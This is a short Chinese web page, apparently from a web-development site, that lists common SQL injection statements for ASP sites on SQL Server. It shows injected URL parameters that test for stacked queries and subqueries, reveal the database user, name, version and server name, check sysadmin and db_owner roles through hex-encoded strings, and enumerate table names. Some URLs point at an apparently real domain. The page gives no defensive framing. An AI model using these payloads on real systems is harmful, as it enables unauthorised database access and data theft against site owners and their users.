SQL注入常用语句
2008-10-27 16:51:30 来源:WEB开发网是否支持多句查询
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--
是否支持子查询
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0
返回用户名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0
当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
PS:0x730079007300610064006D0069006E00 = sysadmin
当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1
0x640062005F006F0077006E0065007200 = db_owner
返回数据库名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0
操作系统和SQLserver版本
http://www.99568.com/99568news/shownews.asp?id=51 And @@version = 1
本地服务器名称
http://www.99568.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1
http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名
- ››SQL Server 2008 R2 下如何清理数据库日志文件
- ››sqlite 存取中文的解决方法
- ››SQL2005、2008、2000 清空删除日志
- ››常用的Windows 7操作系统实用技巧
- ››SQL Server 2005和SQL Server 2000数据的相互导入...
- ››sql server 2008 在安装了活动目录以后无法启动服...
- ››sqlserver 每30分自动生成一次
- ››sqlite 数据库 对 BOOL型 数据的插入处理正确用法...
- ››sql server自动生成批量执行SQL脚本的批处理
- ››sql server 2008亿万数据性能优化
- ››SQL Server 2008清空数据库日志方法
- ››sqlserver安装和简单的使用
更多精彩
赞助商链接